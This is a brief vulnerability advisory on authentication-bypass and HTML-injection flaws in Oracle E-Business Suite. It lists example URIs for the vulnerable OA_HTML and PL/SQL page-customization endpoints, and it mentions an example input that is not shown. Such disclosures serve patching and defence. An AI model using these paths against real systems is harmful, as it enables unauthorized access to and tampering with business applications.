|
|
Oracle E-Business Suite Multiple Remote Vulnerabilities
An attacker can use a browser to exploit these issues. The following example URIs are available: Authentication bypass: http://www.example.com:port/OA_HTML/OA.jsp http://www.example.com:port/OA_HTML/RF.jsp http://www.example.com:port/pls/[DADName]/oracleconfigure.customize?p_page_id=[page_id] http://www.example.com:port/pls/[DADName]/icx_define_pages.DispPageDialog?p_mode=RENAME&p_page_id=[page_id] http://www.example.com:8888/pls/TEST/oracleconfigure.customize?p_page_id=1 HTML injection: http://www.example.com:port/pls/[DADName]/icx_define_pages.editpagelist http://www.example.com:port/pls/[DADName]/oracleconfigure.customize?p_page_id=[page_id] http://www.example.com:port/pls/[DADName]/icx_define_pages.DispPageDialog?p_mode=RENAME&p_page_id=[page_id] http://www.example.com:port/pls/[DADName]/icx_define_pages.DispPageDialog?p_mode=CREATE The following example input is available: |
|
Privacy Statement |